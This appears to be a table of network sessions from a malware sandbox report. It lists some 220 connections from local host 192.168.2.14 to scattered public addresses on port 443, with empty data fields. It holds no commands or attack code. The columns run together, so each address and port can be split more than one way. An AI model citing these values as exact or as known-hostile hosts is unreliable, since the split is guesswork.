                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21299192.168.2.1442868196.163.100.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21300192.168.2.1441488143.141.36.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21301192.168.2.1445794180.227.173.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21302192.168.2.145802078.38.125.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21303192.168.2.1445372138.23.28.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21304192.168.2.143810051.11.125.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21305192.168.2.145677087.226.164.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21306192.168.2.14468622.100.141.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21307192.168.2.144535294.13.190.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21308192.168.2.1455892187.9.96.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21309192.168.2.1434592186.97.33.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21310192.168.2.145644014.134.138.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21311192.168.2.144334451.23.199.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21312192.168.2.14457368.244.22.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21313192.168.2.143940479.229.162.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21314192.168.2.1460966219.188.183.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21315192.168.2.1456662178.250.67.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21316192.168.2.1441308195.93.107.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21317192.168.2.1449964171.45.160.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21318192.168.2.1444186205.226.221.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21319192.168.2.143389073.60.152.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21320192.168.2.144110059.203.146.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21321192.168.2.143323696.45.88.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21322192.168.2.146000482.216.123.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21323192.168.2.1434014141.210.89.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21324192.168.2.1433570183.192.120.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21325192.168.2.1459364163.166.47.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21326192.168.2.14569348.42.4.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21327192.168.2.1457582188.49.189.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21328192.168.2.1451128105.48.119.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21329192.168.2.1443194102.244.93.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21330192.168.2.1437692190.169.175.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21331192.168.2.144940671.99.142.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21332192.168.2.144607642.133.188.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21333192.168.2.144413496.38.139.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21334192.168.2.1457922188.170.252.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21335192.168.2.143524085.94.43.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21336192.168.2.144098698.197.87.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21337192.168.2.1457488212.62.189.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21338192.168.2.1437276114.45.71.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21339192.168.2.145200846.229.197.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21340192.168.2.1446220134.232.195.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21341192.168.2.146046874.239.84.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21342192.168.2.1459082132.119.165.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21343192.168.2.1455004200.244.5.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21344192.168.2.1442876201.46.219.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21345192.168.2.143811436.228.166.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21346192.168.2.1436752204.149.111.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21347192.168.2.1445944204.192.210.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21348192.168.2.1436788151.154.132.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21349192.168.2.1450688105.179.163.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21350192.168.2.145711463.225.174.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21351192.168.2.1456654176.13.254.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21352192.168.2.1460056202.80.46.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21353192.168.2.1453790115.32.240.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21354192.168.2.145811045.170.39.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21355192.168.2.1439642166.109.161.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21356192.168.2.1447944123.241.36.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21357192.168.2.144408670.136.85.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21358192.168.2.145435087.11.13.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21359192.168.2.145524213.238.138.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21360192.168.2.1446132177.240.62.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21361192.168.2.1450568117.155.218.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21362192.168.2.1458018173.185.217.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21363192.168.2.1439418143.23.130.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21364192.168.2.1435054118.137.91.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21365192.168.2.1450032117.143.8.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21366192.168.2.143751879.161.189.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21367192.168.2.144221078.64.214.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21368192.168.2.144907492.71.105.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21369192.168.2.1439830110.168.63.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21370192.168.2.144365632.177.169.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21371192.168.2.1446672188.21.194.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21372192.168.2.143414299.38.182.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21373192.168.2.145889839.214.239.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21374192.168.2.143796631.87.110.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21375192.168.2.1453996175.0.89.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21376192.168.2.1457276122.210.47.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21377192.168.2.1437600156.131.160.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21378192.168.2.1444738138.39.53.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21379192.168.2.146004031.126.84.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21380192.168.2.143482088.85.142.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21381192.168.2.1459326131.189.87.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21382192.168.2.145553278.21.236.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21383192.168.2.144453239.138.255.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21384192.168.2.1459166179.219.34.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21385192.168.2.1459986154.15.184.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21386192.168.2.1449200189.113.61.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21387192.168.2.1449882104.148.180.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21388192.168.2.1436784153.152.66.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21389192.168.2.1454626211.50.167.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21390192.168.2.143914447.190.70.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21391192.168.2.1447594167.233.147.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21392192.168.2.1459308186.27.246.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21393192.168.2.1447332156.247.174.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21394192.168.2.143918813.248.250.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21395192.168.2.1453896186.46.64.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21396192.168.2.1449062109.225.122.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21397192.168.2.1441050216.152.184.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21398192.168.2.1448538164.85.160.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21399192.168.2.1458988159.16.218.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21400192.168.2.145329214.233.85.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21401192.168.2.1439390110.24.217.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21402192.168.2.144984463.98.78.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21403192.168.2.1437504129.136.172.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21404192.168.2.1449334119.80.162.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21405192.168.2.1438082105.37.185.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21406192.168.2.1435330119.52.183.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21407192.168.2.143304819.212.251.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21408192.168.2.1435440125.16.132.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21409192.168.2.1452358158.155.21.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21410192.168.2.143305091.70.240.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21411192.168.2.143899079.139.15.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21412192.168.2.144383094.92.185.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21413192.168.2.1441920200.33.239.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21414192.168.2.144436895.65.237.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21415192.168.2.1445116160.38.255.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21416192.168.2.1449322184.210.224.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21417192.168.2.144134693.70.141.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21418192.168.2.144333095.20.194.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21419192.168.2.144912847.198.140.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21420192.168.2.1444122136.121.155.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21421192.168.2.145187890.234.236.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21422192.168.2.1447648121.93.38.162443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21423192.168.2.1434704182.157.201.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21424192.168.2.1457782133.169.245.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21425192.168.2.1441784129.254.200.25443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21426192.168.2.144530668.203.236.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21427192.168.2.1442648105.82.63.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21428192.168.2.1449458173.101.129.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21429192.168.2.145920686.131.136.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21430192.168.2.1443934116.34.12.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21431192.168.2.143852644.143.248.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21432192.168.2.144184036.28.172.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21433192.168.2.143494468.79.160.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21434192.168.2.144403013.136.8.45443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21435192.168.2.145569225.105.3.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21436192.168.2.1452060208.142.71.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21437192.168.2.1458236149.158.151.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21438192.168.2.1448454197.174.4.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21439192.168.2.1452868153.131.241.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21440192.168.2.1450452185.122.111.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21441192.168.2.143929035.208.221.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21442192.168.2.1459498150.141.13.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21443192.168.2.1433968223.239.227.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21444192.168.2.1457078186.103.32.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21445192.168.2.1445422160.215.33.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21446192.168.2.145067245.236.31.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21447192.168.2.143410459.124.160.166443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21448192.168.2.1439912107.43.138.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21449192.168.2.144162089.232.29.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21450192.168.2.1448168222.247.162.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21451192.168.2.144282092.66.195.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21452192.168.2.144694827.196.143.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21453192.168.2.143592836.236.34.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21454192.168.2.1448040139.137.176.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21455192.168.2.1437464175.121.67.177443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21456192.168.2.145218424.56.8.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21457192.168.2.1440314157.177.248.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21458192.168.2.145775661.84.127.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21459192.168.2.1460880176.39.144.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21460192.168.2.1434380171.118.55.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21461192.168.2.1437250204.15.117.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21462192.168.2.144755458.171.87.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21463192.168.2.1458920102.68.40.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21464192.168.2.1439268122.27.37.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21465192.168.2.1438394176.0.29.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21466192.168.2.145677437.166.167.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21467192.168.2.143364069.32.129.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21468192.168.2.145450479.7.53.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21469192.168.2.1450318181.215.2.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21470192.168.2.1439766192.243.205.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21471192.168.2.1432784161.64.213.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21472192.168.2.145138636.252.163.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21473192.168.2.1437330178.178.153.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21474192.168.2.1439612177.41.202.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21475192.168.2.1443354218.147.54.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21476192.168.2.143307836.79.180.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21477192.168.2.1454100120.116.159.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21478192.168.2.1451004101.144.162.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21479192.168.2.144288279.82.58.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21480192.168.2.145899847.222.130.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21481192.168.2.1451716200.147.196.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21482192.168.2.1447390176.229.118.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21483192.168.2.1460678223.148.193.132443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21484192.168.2.1452780175.230.191.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21485192.168.2.14359762.1.137.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21486192.168.2.145602468.178.40.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21487192.168.2.1441122208.183.208.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21488192.168.2.1456700221.43.152.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21489192.168.2.1439570137.162.147.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21490192.168.2.144643653.95.214.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21491192.168.2.1451750113.219.248.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21492192.168.2.1456002209.181.118.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21493192.168.2.1452070156.31.229.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21494192.168.2.1451784160.83.184.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21495192.168.2.1438446204.212.51.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21496192.168.2.143980644.249.86.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21497192.168.2.1437890201.39.163.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21498192.168.2.1452210134.238.173.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21499192.168.2.1456626105.148.176.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21500192.168.2.1445486222.206.172.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21501192.168.2.1438284140.143.115.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21502192.168.2.1436288119.150.40.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21503192.168.2.145982464.15.38.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21504192.168.2.1438884222.15.107.76443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21505192.168.2.1441150208.22.85.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21506192.168.2.145556091.94.36.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21507192.168.2.1448076188.163.5.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21508192.168.2.1443058118.2.111.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21509192.168.2.1442134180.7.184.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21510192.168.2.144939012.129.178.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21511192.168.2.1450338116.118.177.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21512192.168.2.1452080164.248.127.121443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21513192.168.2.144912627.251.185.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21514192.168.2.1447390195.185.72.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21515192.168.2.1434094114.217.55.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21516192.168.2.1453534159.23.128.51443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21517192.168.2.1442584205.207.153.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21518192.168.2.1459156202.116.250.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              21519192.168.2.144093674.89.21.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
